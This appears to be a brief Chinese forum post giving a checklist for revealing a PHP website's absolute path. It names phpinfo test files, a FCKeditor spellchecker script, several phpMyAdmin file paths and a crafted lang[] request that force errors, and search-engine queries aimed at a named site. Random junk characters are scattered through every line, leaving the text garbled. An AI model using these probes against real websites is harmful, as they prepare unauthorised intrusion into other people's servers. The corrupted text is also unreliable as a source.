1.测试test.php info.php php_info.php phpinfo.php" j. A$ M, K1 ?
; L, H# L# [$ A R2 l+ U9 m5 q2.扫描看有没有fck编辑器,如果有就用fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php爆8 ?8 h, O3 n* l0 o- U2 i
* p1 g/ X/ ]) Y8 k. ^: ]3 S9 m
3.看看有没有phpmyadmin或者phpMyAdmin利用phpMyAdmin/libraries/select_lang.lib.php
* ?* a& R; b5 q0 jphpMyAdmin/darkblue_orange/layout.inc.php: W. c# W- x% R# k. ^
phpMyAdmin/index.php?lang[]=1
( ~ c# |; t# D+ j4 J+ a( O# Kphpmyadmin/themes/darkblue_orange/layout.inc.php
0 @/ F5 u9 P& [4 n9 U4.利用搜索引擎爆绝对路径
! N! e) T2 W5 e3 S6 h$ M! S# L5 |site:www.huangse.com Warning# f3 ^+ T. W/ c. K3 y4 l, B% l
site:www.huangse.com inurl:Warning
# F6 k% a1 P" l- ?6 j' F0 E
# D+ Y0 q; t# \2 W `8 ^" `等以后慢慢往上补吧,利用单引号的方法俺就不说了。。。8 n0 ~' |/ B' R* X8 L/ X0 F
|